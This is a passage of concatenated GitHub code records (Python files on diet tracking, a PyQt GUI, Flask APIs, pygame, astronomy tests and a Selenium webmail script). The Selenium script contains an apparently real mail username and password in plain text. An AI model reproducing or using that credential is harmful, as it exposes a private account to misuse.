{'portionId': '563c6669305d6e1834ab948d', 'sourceId': 58783, '_displayName': 'Egg(s)',\n 'sourcePortionName': 'serving(s)', 'points': 4, 'isCore': True, 'name': 'Egg(s)',\n 'entryId': 'ee1e26a0-4e37-11e6-8aa7-21442c64eff3', 'smartPointsPrecise': 2.0201, 'timeOfDay': 'morning',\n 'sourcePortionId': 9, 'versionId': '563c6669305d6e1834ab9485', 'smartPoints': 4, 'portionTypeId': 800,\n 'isActive': True, 'portionName': 'item(s)', 'portionSize': 2, 'isPowerFood': True, 'trackedDate': '2016-07-20',\n 'sourceType': WW_FOOD, '_servingDesc': '2 item(s)', '_id': '561dcbbae33175473413d475',\n 'pointsPrecise': 1.8347}\n food_detail = get_food_detail(session, food_log)\n result = get_nutrition(food_detail, food_log)\n assert result == {\n 'calories': 144.0,\n 'sodium': 142.0,\n 'saturatedFat': 3.12,\n 'carbs': 0.72,\n 'sugar': 0.36,\n 'fat': 9.5,\n 'protein': 12.56\n }\n\n\ndef test_get_calories_ww_recipe(session):\n with vcr.use_cassette(\"{}/{}.yaml\".format(CASSETTES_HOME, 'steak_recipe.yaml')):\n # This object is actually quite more complicated. 
But I don't care\n food_log = {'smartPoints': 4, '_servingDesc': '1 serving(s)',\n '_displayName': 'Coffee-Chili Rubbed Flank Steak with Peppers and Onions', 'trackedDate': '2016-07-20',\n 'pointsPrecise': 4.8926, 'portionSize': 1, 'isActive': True, 'entryId': '6fc42740-4e38-11e6-8237-3d072975d999',\n 'points': 5, 'sourceId': 523991, 'smartPointsPrecise': 4, 'portionName': 'serving(s)',\n 'name': 'Coffee-Chili Rubbed Flank Steak with Peppers and Onions', 'portionTypeId': None,\n 'versionId': '57516df7f9984a6a3682ac0d', '_id': '57516df7f9984a6a3682ac0c', 'timeOfDay': 'morning',\n 'sourcePortionName': 'serving(s)', 'sourcePortionId': None, 'sourceType': WW_RECIPE, 'portionId': None}\n result = get_nutrition(get_food_detail(session, food_log), food_log)\n assert result == {\n 'sodium': 1089.58948,\n 'protein': 26.27602775,\n 'fiber': 2.48177325,\n 'fat': 7.102034249999999,\n 'sugar': 3.51908025,\n 'saturatedFat': 2.4551232499999998,\n 'carbs': 7.944517,\n 'calories': 201.15632675\n }\n\n\ndef test_day_in_life(username, password):\n with open(\"{}/{}\".format(FIXTURES_HOME, 'food_for_day.json')) as infile:\n expected = json.loads(infile.read())\n with vcr.use_cassette(\"{}/{}.yaml\".format(CASSETTES_HOME, 'day_in_life.yaml')):\n result = get_nutrition_info_for_day(username, password, datetime.datetime(2016, 2, 21))\n assert expected == result\n","repo_name":"Bachmann1234/weight-watchers-sync","sub_path":"tests/test_weight_watchers.py","file_name":"test_weight_watchers.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"2"} +{"seq_id":"4982603903","text":"# 문자열을 n개 단위로 잘라 최솟값을 리턴해야 함.\n\nfrom collections import deque\ndef solution(s):\n answer = 0\n \n # 문자열 s를 deque로 바꿈.\n LENGTH = len(s)\n \n for i in range(1, LENGTH):\n splited_s_dq = [ s[size:size + i] for size in range(0, LENGTH, i) ]\n # n개 단위로 잘라내는 작업.\n # range의 3번째 인자는 숫자 사이의 거리\n # splited_s_dq라는 리스트를 만들어서 리스트컨프리헨젼으로 n개 단위로 나눈 값으로 초기화\n temp = []\n splited_s_dq = deque(splited_s_dq)\n \n for i in range(1, len(splited_s_dq)):\n if splited_s_dq[i] == splited_s_dq[i - 1]:\n answer += 1\n # 이전 문자와 동일하다면.\n else:\n continue\n print(answer)\n return answer\n\nprint(solution(\"aabbaccc\"))\n# print(solution(\"ababcdcdababcdcd\"))\n# print(solution(\"abcabcabcabcdededededede\"))\n# print(solution(\"xababcdcdababcdcd\"))\n","repo_name":"dongkyu92/TIL","sub_path":"Python/Algorithm/문자열 압축.py","file_name":"문자열 압축.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"15613952043","text":"def factorial (x):\r\n result = 1\r\n for i in range(2,x+1):\r\n result=result*i\r\n return result\r\n\r\na=int(input())\r\nb=int(input())\r\n\r\nresult = factorial(a)/factorial(b)\r\nprint(f\"{result:.2f}\")","repo_name":"olgayordanova/PythonFundamental","sub_path":"Function/FactorialDivision.py","file_name":"FactorialDivision.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"703222961","text":"import sys\nimport os\nimport warnings\nfrom enum import Enum, IntEnum\nimport numpy as np\nimport json\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets, uic, sip\n# from PySide2 import QtCore, QtGui, QtWidgets, uic\n\nimport pyfdd\n\n# Load the ui created with PyQt creator\n# First, convert .ui file to .py with,\n# pyuic5 datapattern_widget.ui -o datapattern_widget.py\n# import with 
absolute import locations\nfrom pyfdd.gui.qt_designer.bkgtools_widget import Ui_BkgToolsWidget\nfrom pyfdd.gui.qt_designer.corrfactor_dialog import Ui_CorrFactorDialog\nfrom pyfdd.gui.datapattern_interface import DataPattern_window, DataPatternControler\n\nimport pyfdd.gui.config as config\n\n\nclass CorrFactor_dialog(QtWidgets.QDialog, Ui_CorrFactorDialog):\n def __init__(self, parent_widget, corr_factor, bkg_counts=None):\n super(CorrFactor_dialog, self).__init__(parent_widget)\n self.setupUi(self)\n if bkg_counts is not None:\n bkg_counts = int(bkg_counts)\n\n self.corr_factor = corr_factor\n self.bkg_counts = bkg_counts if bkg_counts is not None else 0 if not config.parser.has_option('bkgpattern', 'bkg_counts') else \\\n config.getlist('bkgpattern', 'bkg_counts')\n self.bkg_time = 3600 if not config.parser.has_option('bkgpattern','bkg_time') else \\\n config.getlist('bkgpattern', 'bkg_time')\n self.data_counts = 1000000 if not config.parser.has_option('bkgpattern','data_counts') else \\\n config.getlist('bkgpattern', 'data_counts')\n self.data_time = 3600 if not config.parser.has_option('bkgpattern', 'data_time') else \\\n config.getlist('bkgpattern', 'data_time')\n\n self.le_data_time.setText(str(self.data_time))\n self.le_data_counts.setText(str(self.data_counts))\n self.le_bkg_time.setText(str(self.bkg_time))\n self.le_bkg_counts.setText(str(self.bkg_counts))\n self.le_factor.setText(str(self.corr_factor))\n\n validator0 = QtGui.QDoubleValidator(bottom=0)\n validator0.setLocale(QtCore.QLocale(\"en_US\"))\n validator1 = QtGui.QDoubleValidator(bottom=1)\n validator1.setLocale(QtCore.QLocale(\"en_US\"))\n self.le_data_time.setValidator(validator0)\n self.le_data_counts.setValidator(validator0)\n self.le_bkg_time.setValidator(validator0)\n self.le_bkg_counts.setValidator(validator0)\n self.le_factor.setValidator(validator1)\n\n self.pb_calculate.clicked.connect(self.call_pb_calculate)\n self.buttonBox.clicked.connect(self.closeEvent)\n\n def call_pb_calculate(self):\n self.data_time = float(self.le_data_time.text())\n self.data_counts = float(self.le_data_counts.text())\n self.bkg_time = float(self.le_bkg_time.text())\n self.bkg_counts = float(self.le_bkg_counts.text())\n\n try:\n factor = pyfdd.BackgroundTools.calculate_factor(data_time=self.data_time, data_cts=self.data_counts,\n bkg_time=self.bkg_time, bkg_cts=self.bkg_counts)\n except Exception as e:\n QtWidgets.QMessageBox.warning(self, 'Warning message', str(e))\n return\n\n self.corr_factor = factor\n self.le_factor.setText(str(self.corr_factor))\n\n def closeEvent(self, event: QtGui.QCloseEvent) -> None:\n self.data_time = float(self.le_data_time.text())\n self.data_counts = float(self.le_data_counts.text())\n self.bkg_time = float(self.le_bkg_time.text())\n self.bkg_counts = float(self.le_bkg_counts.text())\n self.corr_factor = float(self.le_factor.text())\n\n config.parser['bkgpattern']['data_time'] = str(self.data_time)\n config.parser['bkgpattern']['data_counts'] = str(self.data_counts)\n config.parser['bkgpattern']['bkg_time'] = str(self.bkg_time)\n config.parser['bkgpattern']['bkg_counts'] = str(self.bkg_counts)\n\n if isinstance(event, QtGui.QCloseEvent):\n event.accept()\n\n\nclass BkgTools_groupbox(QtWidgets.QWidget, Ui_BkgToolsWidget):\n\n def __init__(self, parent_widget):\n super(BkgTools_groupbox, self).__init__(parent_widget)\n self.setupUi(self)\n\n\nclass BkgPattern_window(QtWidgets.QMainWindow):\n \"\"\" Class to use the data pattern widget in a separate window\"\"\"\n def __init__(self, *args, **kwargs):\n 
super(BkgPattern_window, self).__init__(*args, **kwargs)\n\n # Load configuration\n if config.parser is None:\n config.filename = 'bkgpattern_config.ini'\n config.read()\n\n # Set up the window\n self.window_title = \"Background Pattern\"\n self.setWindowTitle(self.window_title)\n self.statusBar()\n\n # Set a BkgPattern widget as central widget\n self.bp_w = BkgPattern_widget(mainwindow=self)\n self.setCentralWidget(self.bp_w)\n self.resize(1150, 670)\n\n # Connect signals\n self.bp_w.datapattern_changed.connect(self.title_update)\n self.bp_w.datapattern_saved.connect(self.title_update)\n\n def set_datapattern(self, datapattern):\n self.bp_w.set_datapattern(datapattern)\n\n def title_update(self):\n if self.bp_w.are_changes_saved() is False:\n if self.window_title[-1] == \"*\":\n pass\n else:\n self.window_title = self.window_title + '*'\n else:\n if self.window_title[-1] == \"*\":\n self.window_title = self.window_title[0:-1]\n self.setWindowTitle(self.window_title)\n\n def closeEvent(self, event: QtGui.QCloseEvent) -> None:\n config.write()\n\n\nclass BkgPattern_widget(pyfdd.gui.datapattern_interface.DataPattern_widget):\n \"\"\" Data pattern widget class\"\"\"\n\n #datapattern_opened = QtCore.pyqtSignal()\n #datapattern_changed = QtCore.pyqtSignal()\n #datapattern_saved = QtCore.pyqtSignal()\n\n def __init__(self, *args, mainwindow=None, **kwargs):\n \"\"\"\n Init method for the data pattern widget\n :param args:\n :param mainwindow: Main window object\n :param kwargs:\n \"\"\"\n\n super(BkgPattern_widget, self).__init__(*args, mainwindow=mainwindow, **kwargs)\n\n # Remove widgets\n self.gridLayout_4.removeWidget(self.pb_orientchanneling)\n self.gridLayout_4.removeWidget(self.pb_editorientation)\n self.gridLayout_4.removeWidget(self.pb_fitrange)\n self.pb_orientchanneling.deleteLater()\n self.pb_editorientation.deleteLater()\n self.pb_fitrange.deleteLater()\n self.pb_orientchanneling = None\n self.pb_editorientation = None\n self.pb_fitrange = None\n\n # Adapt widgets\n self.dp_menu.setTitle('Background')\n\n # Add background tools\n self.bkgtools = BkgTools_groupbox(parent_widget=self)\n self.verticalLayout_2.insertWidget(3, self.bkgtools)\n\n # Popup widgets that need a reference in self\n self.dp_external = []\n\n # Set config section\n if not config.parser.has_section('bkgpattern'):\n config.parser.add_section('bkgpattern')\n\n default_is_enabled = True if not config.parser.has_option('bkgpattern', 'is_enabled') else \\\n config.getboolean('bkgpattern', 'is_enabled')\n default_corr_factor = 1 if not config.parser.has_option('bkgpattern', 'corr_factor') else \\\n config.getlist('bkgpattern', 'corr_factor')\n default_smooth_sigma = 0 if not config.parser.has_option('bkgpattern', 'smooth_sigma') else \\\n config.getlist('bkgpattern', 'smooth_sigma')\n\n # Variables\n self.is_enabled = default_is_enabled\n self.corr_factor = default_corr_factor\n self.smooth_sigma = default_smooth_sigma\n\n self.bkgtools.cb_enabled.setChecked(self.is_enabled)\n self.bkgtools.le_gauss_sigma.setText(str(self.smooth_sigma))\n self.bkgtools.le_correction_factor.setText(str(self.corr_factor))\n\n # Connect signals\n # Background tools\n self.bkgtools.cb_enabled.clicked.connect(self.call_cb_enabled)\n self.bkgtools.pb_set_factor.clicked.connect(self.call_pb_set_factor)\n self.bkgtools.pb_set_sigma.clicked.connect(self.call_pb_set_sigma)\n self.bkgtools.bp_view_background.clicked.connect(self.call_p_view_background)\n\n def get_background_pattern_and_corrfactor(self):\n if not self.is_enabled:\n return None, 
None\n if self.datapattern is None:\n return None, None\n\n btools = pyfdd.BackgroundTools()\n btools.set_sigma(self.smooth_sigma)\n background_array = btools.get_smoothed_background(self.datapattern)\n return background_array, self.corr_factor\n\n def call_cb_enabled(self):\n self.is_enabled = self.bkgtools.cb_enabled.isChecked()\n\n # update config\n config.parser['bkgpattern']['is_enabled'] = str(self.is_enabled)\n\n def call_pb_set_factor(self):\n if not self.datapattern is None:\n bkg_counts = self.datapattern.pattern_matrix.sum()\n else:\n bkg_counts = None\n\n factor_dialog = CorrFactor_dialog(parent_widget=self, corr_factor=self.corr_factor, bkg_counts=bkg_counts)\n if factor_dialog.exec_() == QtWidgets.QDialog.Accepted:\n self.corr_factor = factor_dialog.corr_factor\n self.bkgtools.le_correction_factor.setText(str(self.corr_factor))\n\n # update config\n config.parser['bkgpattern']['corr_factor'] = str(self.corr_factor)\n else:\n # Canceled\n pass\n\n def call_pb_set_sigma(self):\n\n value, ok = QtWidgets.QInputDialog.getDouble(self, 'Gaussian Sigma',\n 'Set the sigma value to be used for smoothing the pattern\\t\\t\\t',\n value=self.smooth_sigma, min=0, decimals = 1)\n if ok:\n self.smooth_sigma = value\n\n self.bkgtools.le_gauss_sigma.setText(str(self.smooth_sigma))\n\n # update config\n config.parser['bkgpattern']['smooth_sigma'] = str(self.smooth_sigma)\n\n def call_p_view_background(self):\n if not self.datapattern_exits():\n return\n\n btools = pyfdd.BackgroundTools()\n btools.set_sigma(self.smooth_sigma)\n background_dp = btools.get_smoothed_background(self.datapattern, as_datapattern=True)\n new_dp_window = DataPattern_window()\n new_dp_window.set_datapattern(background_dp)\n new_dp_window.setWindowTitle('Smoothed Background')\n new_dp_window.show()\n self.dp_external.append(new_dp_window)\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n window = BkgPattern_window()\n window.show()\n print(window.size())\n sys.exit(app.exec())\n\n\nif __name__ == '__main__':\n main()","repo_name":"edbosne/pyfdd","sub_path":"pyfdd/gui/bkgpattern_interface.py","file_name":"bkgpattern_interface.py","file_ext":"py","file_size_in_byte":10749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"26184325788","text":"from flask import Flask,request,jsonify,Response\nfrom flask_restful import Resource,Api\nfrom PIL import Image,ImageFile\nimport cv2\nimport numpy\nfrom demo import demo\nfrom model import train_model, valid_model\nimport tensorflow as tf\nimport json\nimport sys\nimport base64\n\n\napp = Flask(__name__)\napi = Api(app)\n\n\nflags = tf.app.flags\nflags.DEFINE_string('MODE', 'demo', \n 'Set program to run in different mode, include train, valid and demo.')\nflags.DEFINE_string('checkpoint_dir', './ckpt', \n 'Path to model file.')\nflags.DEFINE_string('train_data', './data/fer2013/fer2013.csv',\n 'Path to training data.')\nflags.DEFINE_string('valid_data', './valid_sets/',\n 'Path to training data.')\nflags.DEFINE_boolean('show_box', False, \n 'If true, the results will show detection box')\nFLAGS = flags.FLAGS\n\nSAMPLE_IMAGE_PATH=\"\"\n\nclass Image_Emotion_Recognition(Resource):\n assert FLAGS.MODE in ('train', 'valid', 'demo')\n def get(self):\n return {\"about\":'abc'}\n \n def post(self):\n \n x=\"\"\n self.bytes_to_img(request.form['img'])\n if FLAGS.MODE == 'demo':\n img = Image.open('temp_file.jpg')\n open_cv_image = numpy.array(img) \n open_cv_image = open_cv_image[:, :, ::-1].copy() \n 
x=demo(FLAGS.checkpoint_dir, FLAGS.show_box,open_cv_image)\n print(\"test: = \"+str(x))\n elif FLAGS.MODE == 'train':\n train_model(FLAGS.train_data)\n elif FLAGS.MODE == 'valid':\n valid_model(FLAGS.checkpoint_dir, FLAGS.valid_data)\n\n\n return json.loads(x)\n \n def image_to_bytes(self,url):\n with open(\"temp_file.jpg\", \"rb\") as imageFile:\n str = base64.b64encode(imageFile.read())\n return str\n \n def bytes_to_img(self,bytes):\n imgdata = base64.b64decode(bytes)\n filename = 'temp_file.jpg' # I assume you have a way of picking unique filenames\n with open(filename, 'wb') as f:\n f.write(imgdata)\n print('DONE')\n\n\nclass Multi(Resource):\n def get(self,num):\n return {'result':num*10}\n\napi.add_resource(Image_Emotion_Recognition,'/Img_Emotion/')\napi.add_resource(Multi,'/multi/')\n\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0',debug=True)\n\n\n","repo_name":"Taha248/Emotion-Recognition-System","sub_path":"Facial_Emotion_Detection_API/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"33650956186","text":"import pytest\nfrom pytest import approx\nimport numpy as np\n\nfrom scopesim.effects import AtmosphericDispersionCorrection as ADC\nfrom scopesim.effects import AtmosphericDispersion as AD\nfrom scopesim.tests.mocks.py_objects.fov_objects import _centre_fov\n\n\n@pytest.fixture(scope=\"function\")\ndef atmo_params():\n \"\"\"\n airmass = 1.14\n altitude = 2400m\n temperature = 7 deg\n pressure = 0.755 bar\n humidity = ?\n\n Approx atmospheric refraction at 500nm = 24.8 arcsec\n Diff atmo refr relative to 500nm\n - 0.5um : 0 arcsec\n - 1.5um : -0.49 arcsec\n - 2.5um : -0.53 arcsec\n \"\"\"\n _atmo_params = {\"airmass\": 1.14,\n \"temperature\": 7,\n \"humidity\": 0.5,\n \"pressure\": 0.755,\n \"latitude\": -26,\n \"altitude\": 2400,\n \"pupil_angle\": 0,\n \"pixel_scale\": 1,\n \"wave_min\": 0.5,\n \"wave_mid\": 0.5,\n \"wave_max\": 2.5}\n return _atmo_params\n\n\nclass TestInit:\n def test_initialises_when_all_needed_keywords_given(self, atmo_params):\n assert isinstance(ADC(**atmo_params), ADC)\n\n def test_throws_error_when_not_all_keywords_are_provided(self):\n with pytest.raises(ValueError):\n ADC(**{\"its_over\": 9000})\n\n\nclass TestApplyTo:\n def test_does_nothing_when_passed_wrong_type(self, atmo_params):\n adc = ADC(**atmo_params)\n doc_brown = adc.apply_to({\"gigawatts\": 1.21})\n assert doc_brown[\"gigawatts\"] == 1.21\n\n def test_zero_shift_at_zenith(self, atmo_params):\n fov = _centre_fov(n=50, waverange=[1.5, 1.7])\n old_crpix_d = fov.header[\"CRPIX1D\"], fov.header[\"CRPIX2D\"]\n atmo_params[\"airmass\"] = 1.\n adc = ADC(**atmo_params)\n fov_new = adc.apply_to(fov)\n new_crpix_d = fov_new.header[\"CRPIX1D\"], fov_new.header[\"CRPIX2D\"]\n\n assert np.all(old_crpix_d == new_crpix_d)\n\n @pytest.mark.parametrize(\"waves, offset\",\n [([0.4, 0.6], 0.),\n ([1.4, 1.6], 0.490),\n ([2.4, 2.6], 0.528)])\n def test_correct_test_shift_applied_to_image_plane_wcs(self, atmo_params,\n waves, offset):\n fov = _centre_fov(n=10, waverange=waves)\n old_crpix_d = fov.header[\"CRPIX1D\"], fov.header[\"CRPIX2D\"]\n\n adc = ADC(**atmo_params)\n fov_new = adc.apply_to(fov)\n\n new_crpix_d = fov_new.header[\"CRPIX1D\"], fov_new.header[\"CRPIX2D\"]\n\n abs_diff = np.sum((np.array(new_crpix_d) -\n np.array(old_crpix_d))**2)**0.5\n\n # this works because the pixel_scale is 1 arcsec\n assert abs_diff == approx(offset, rel=1e-3)\n assert 
new_crpix_d[1] == approx(old_crpix_d[1] - offset, rel=1e-3)\n\n\nclass TestCombinedWithAtmoDisp:\n @pytest.mark.parametrize(\"waves\", [(0.7, 0.8), (1.4, 1.6), (2.4, 2.6)])\n @pytest.mark.parametrize(\"angle\", [0, 15, 45, 85, 90])\n @pytest.mark.parametrize(\"pixel_scale\", [0.004, 0.04, 0.4])\n def test_shifts_between_adc_and_ad_are_opposite(self, atmo_params, waves,\n angle, pixel_scale):\n fov_wave_mid = np.average(waves)\n atmo_params[\"pixel_scale\"] = pixel_scale\n atmo_params[\"pupil_angle\"] = angle\n atmo_params[\"sub_pixel_fraction\"] = 0.001\n\n fov = _centre_fov(n=10, waverange=waves)\n fov.header[\"CDELT1\"] = 1 / 3600 * pixel_scale\n fov.header[\"CDELT2\"] = 1 / 3600 * pixel_scale\n old_crpix_d = np.array([fov.header[\"CRPIX1D\"], fov.header[\"CRPIX2D\"]])\n\n ad = AD(**atmo_params)\n adc = ADC(**atmo_params)\n ad_shifts = ad.fov_grid()\n ad_x_shift = np.interp(fov_wave_mid, ad_shifts[0], ad_shifts[1])\n ad_y_shift = np.interp(fov_wave_mid, ad_shifts[0], ad_shifts[2])\n\n adc.apply_to(fov)\n new_crpix_d = np.array([fov.header[\"CRPIX1D\"], fov.header[\"CRPIX2D\"]])\n fov_shifts = new_crpix_d - old_crpix_d\n adc_x_shift = fov_shifts[0] * fov.header[\"CDELT1\"] * 3600\n adc_y_shift = fov_shifts[1] * fov.header[\"CDELT1\"] * 3600\n\n assert adc_x_shift == approx(ad_x_shift, rel=1e-3)\n assert adc_y_shift == approx(ad_y_shift, rel=1e-3)\n","repo_name":"AstarVienna/ScopeSim","sub_path":"scopesim/tests/tests_effects/test_AtmosphericDispersionCorrection.py","file_name":"test_AtmosphericDispersionCorrection.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"2"} +{"seq_id":"6968262545","text":"import pygame\nfrom Enums import Direction, Color, BulletType\nfrom Bullet import Bullet\n\n\nclass Player:\n speed = 1.25\n scale = 3\n respawn_time = 10\n\n def __init__(self, x, y):\n self.is_draw = False\n self.dead = False\n self.respawn_timer = 0\n self.bullets = list()\n self.lives = 2\n self.start_x = x\n self.x = x\n self.y = y\n self.sprite = pygame.transform.scale(\n pygame.image.load(\"Sprites/PlayerSprite.png\"), (13 * self.scale, 8 * self.scale))\n self.rect = self.sprite.get_rect().move((x, y))\n\n def move(self, direction, window_width):\n if self.dead:\n return\n\n if self.x > 0:\n if direction == Direction.LEFT:\n self.x -= self.speed\n if self.x < window_width - self.rect.width:\n if direction == Direction.RIGHT:\n self.x += self.speed\n self.rect.x = self.x\n\n def draw(self, window):\n if not self.dead:\n window.blit(self.sprite, self.rect)\n\n def shoot(self):\n if self.dead:\n return\n\n if len(self.bullets) < 1:\n self.bullets.append(Bullet(self.x, self.y, Color.Cyan, BulletType.Player))\n\n def is_colliding_bullet(self, bullet):\n if self.dead:\n return\n\n if not bullet.bullet_type == BulletType.Player:\n self.dead = self.rect.colliderect(bullet.rect)\n\n return self.dead\n\n def is_colliding_enemy(self, enemy):\n if self.rect.colliderect(enemy.rect):\n self.dead = True\n self.lives = -1\n return True\n return False\n\n def respawn(self):\n if self.respawn_time < self.respawn_timer or self.lives < 0:\n return\n if self.dead:\n self.respawn_timer += 0.1\n if self.respawn_time < self.respawn_timer:\n print(self.lives)\n self.x = self.start_x\n self.rect.x = self.x\n self.respawn_timer = 0\n self.lives -= 1\n self.dead = 
False\n","repo_name":"xyoouy/SpaceInvaders","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16539564910","text":"# -*- coding: utf-8 -*-\n# created by wmin3\nfrom util.ObjectMap import *\nfrom util.KeyBoardUtil import KeyBoardKeys\nfrom util.ClipboardUtil import Clipboard\nfrom util.WaitUtil import WaitUtil\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\ndef TestSendMailWithAttachment():\n\n driver = webdriver.Firefox(executable_path=\"C:\\\\WebDriver\\\\geckodriver\")\n driver.maximize_window()\n\n driver.get(\"http://mail.126.com\")\n time.sleep(5)\n assert u\"126网易免费邮\" in driver.page_source\n\n wait = WaitUtil(driver)\n wait.frameToBeAvailableAndSwitchToIt('xpath',\"//iframe[@name='']\")\n username = getElement(driver,\"xpath\",\"//input[@name='email']\")\n username.send_keys(\"minwu126\")\n passwd = getElement(driver, \"xpath\", \"//input[@name='password']\")\n passwd.send_keys(\"wuli8228680\")\n passwd.send_keys(Keys.ENTER)\n time.sleep(10)\n assert u\"网易邮箱\" in driver.title\n\n driver.switch_to.default_content()\n time.sleep(5)\n\n addressBook = wait.visibilityOfElementLocated(\"xpath\",\"//div[text()='通讯录']\")\n addressBook.click()\n newContact = wait.visibilityOfElementLocated(\"xpath\",\"//span[text()='新建联系人']\")\n newContact.click()\n\n contactName = wait.visibilityOfElementLocated(\"xpath\",\"//a[@title='编辑详细姓名']/preceding-sibling::div/input\")\n contactName.send_keys(\"LILY\")\n email = getElement(driver,\"xpath\",\"//*[@id='iaddress_MAIL_wrap']//input\")\n email.send_keys(\"lily@qq.com\")\n getElement(driver,\"xpath\",\"//span[text()='设为星标联系人']/preceding-sibling::span/b\").click()\n\n mobile=getElement(driver,\"xpath\",\"//*[@id='iaddress_TEL_wrap']//dd//input\")\n mobile.send_keys(\"18888888891\")\n\n getElement(driver,\"xpath\",\"//textarea\").send_keys(u\"朋友\") #备注\n getElement(driver,\"xpath\",\"//span[text()='确 定']\").click()\n time.sleep(2)\n\n assert u\"lily@qq.com\" in driver.page_source\n print(u\"添加成功\")\n time.sleep(3)\n getElement(driver,\"xpath\",\"//div[.='首页']\").click()\n time.sleep(2)\n element = wait.visibilityOfElementLocated(\"xpath\",\"//span[text()='写 信']\")\n element.click()\n print(u\"写信\")\n\n receiver = getElement(driver,\"xpath\",\"//div[contains(@id,'_mail_emailinput')]//input\")\n\n receiver.send_keys(\"757693255@qq.com\")\n subject = getElement(driver,\"xpath\",\"//div[@aria-label='邮件主题输入框,请输入邮件主题']/input\")\n subject.send_keys(u\"新邮件\")\n attachment=getElement(driver,\"xpath\",\"//div[@title='点击添加附件']/input[@size='1' and @type='file']\")\n attachment.send_keys(\"d:\\\\a.txt\")\n\n time.sleep(5)\n\n wait.frameToBeAvailableAndSwitchToIt(\"xpath\",\"//iframe[@tabindex=1]\")\n body= getElement(driver,\"xpath\",\"/html/body\")\n body.send_keys(u\"发给自己的一封信\")\n\n driver.switch_to_default_content()\n\n getElement(driver,\"xpath\",\"//header//span[text()='发送']\").click()\n print(u\"开始发送邮件\")\n time.sleep(3)\n assert u\"发送成功\"in driver.page_source\n driver.quit()\n\nif __name__ ==\"__main__\":\n TestSendMailWithAttachment()","repo_name":"AnnWu/DataDrivenFrameWork","sub_path":"testScripts/TestSendMailWithAttachment1.py","file_name":"TestSendMailWithAttachment1.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38694192392","text":"from bson.json_util import 
dumps, loads\nfrom server.settings import clientOpen,s3Client\nfrom datetime import datetime\nimport time\n\nclass Rooms:\n\n def __init__(self):\n \n self.client=clientOpen()\n \n\n def creatorPP(self, room_code):\n creator = self.client.myspace.rooms.find_one({\"room_code\":room_code}, {\"creator\":True})[\"creator\"]\n print(creator)\n return creator[\"profile_picture\"]\n\n def getImage(self, id):\n return self.client.auth.profile.find_one({\"_id\":id},{\"profile_picture\":True})[\"profile_picture\"]\n\n def test(self,profile,title,schedule,room_type,users=[]):\n\n return loads(dumps(self.client.auth.profile.find_one({\"_id\":profile})))\n\n def create(self,profile,room_code,title,category,schedule,room_type=None,users=[]):\n data=loads(dumps(self.client.auth.profile.find_one({\"_id\":profile})))\n if not data:\n res={\n \"message\":\"User Not Found\",\n \"status\":True\n }\n return res\n channel_name=data[\"channel_name\"]\n \n if self.client.myspace.rooms.find_one({\"schedule\":schedule, \"creator\":profile}):\n \n raise ValueError(\"Schedule time is already occupied\")\n \n else:\n\n listener=loads(dumps(self.client.auth.profile.find_one({\"_id\":profile})))\n creator={\n \"_id\":listener[\"_id\"],\n \"profile_picture\":listener[\"profile_picture\"],\n \"channel_name\":listener[\"channel_name\"],\n \"name\":listener[\"name\"]\n }\n # room_code = '_'.join(channel_name.split(' '))+\"_\"+'_'.join(title.split(' '))+\"_\"+str(schedule)+\"_\"+str(time.time()).split('.')[0]\n \n room_live_status = False\n # If the schedule time is before or equal to current time then it is live. \n # On Frontend there should also be check for not allowing the before time than current time.\n # Schedule time is divided by 1000 as it is comming in milliseconds \n if datetime.fromtimestamp(schedule / 1000) <= datetime.now():\n room_live_status = True\n \n # add categories in user categories\n # self.client.categories.users.insert_one( {\n # \"_id\": listener[\"_id\"],\n # \"id\": listener[\"_id\"],\n # \"categories\":category,\n # \"sub_cat\":[],\n # \"sub_category\":[]\n # }\n # )\n\n if not room_type:\n \n self.client.myspace.rooms.insert_one({\n # \"_id\":profile+\"_\"+title+\"_\"+str(datetime.utcnow().timestamp()),\n # let mongodb generate id \n \"creator\":creator,\n \"title\":title,\n \"admin\":listener[\"email\"], # store creator email id to use it for join room event.\n \"schedule\":schedule,\n \"private\":room_type,\n \"category\":category,\n \"live\":room_live_status,\n \"room_code\":room_code, # to ensure room_code always unique added datetime.now\n \"listeners\":[],\n \"sub_category\":[], # attributes from liverooms\n \"adminSocket\":\"\",\n \"allowedUsers\":[],\n \"otherUsers\":[],\n \"screenShared\":[],\n \"message\":[]\n })\n \n else:\n listeners=[]\n for i in users:\n listener=self.client.auth.profile.find_one({\"_id\":i})\n listeners.append({\n \"id\":i,\n \"name\":listener[\"name\"],\n \"channelName\":listener[\"channel_name\"],\n \"profilePicture\":listener[\"profile_picture\"] \n })\n\n self.client.myspace.rooms.insert_one({\n # \"_id\":profile+\"_\"+title+\"_\"+str(datetime.utcnow().timestamp()),\n # let mongodb generate id \n \"creator\":creator,\n \"title\":title,\n \"admin\":listener[\"email\"], \n \"schedule\":schedule,\n \"private\":room_type,\n \"category\":category,\n \"live\":room_live_status,\n \"room_code\":room_code, # add time.time to ensure room_code always unique\n \"listeners\":listeners,\n \"sub_category\":[], # attributes from liverooms\n \"adminSocket\":\"\",\n 
